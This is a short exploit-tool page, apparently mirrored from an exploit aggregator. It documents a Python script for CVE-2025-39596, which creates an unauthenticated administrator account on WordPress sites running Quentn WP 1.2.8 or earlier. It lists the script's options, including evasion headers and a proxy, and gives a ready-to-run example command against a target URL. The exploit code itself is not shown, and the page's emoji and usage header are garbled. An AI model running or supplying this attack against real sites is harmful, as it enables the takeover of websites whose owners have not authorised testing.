Share
## https://sploitus.com/exploit?id=D24E4AE6-D8EE-5833-BC12-E1681F02A1BA
# CVE-2025-39596
Quentn WP <= 1.2.8 - Unauthenticated Privilege Escalation
# ๐จ Quentn WP -e [options]
```
**Required Arguments:**
- `-u`, `--url` Target WordPress site URL (e.g., http://127.0.0.1/wordpress)
- `-e`, `--email` Email for the new admin account
**Optional Arguments:**
- `-f`, `--fname` First name (default: Pwn)
- `-l`, `--lname` Last name (default: Admin)
- `-r`, `--role` Role to assign (default: administrator)
- `-k`, `--key` Quentn API key if known
- `--cookie` Cookie for authenticated bypass if available
- `--proxy` Proxy support (e.g., http://127.0.0.1:8080)
- `--skip-ssl` Skip SSL verification
- `--extra` Enable extra evasion headers
**Example:**
```bash
python3 CVE-2025-39596.py -u http://target.com/wordpress -e hacked@attacker.com --fname Root --lname User --proxy http://127.0.0.1:8080 --extra
```
---
## ๐ค Output
- On **Success**:
`Exploit Success By | Nxploited`
- On **Failure**:
Shows the HTTP status code and response message for troubleshooting.
---
## โ ๏ธ Disclaimer
This tool is provided **for educational and authorized security testing purposes only**.
**Any misuse is strictly prohibited.**
The author is **not responsible** for any damage or misuse caused by this code.
---
**_By: Nxploited ( Khaled Alenazi )_**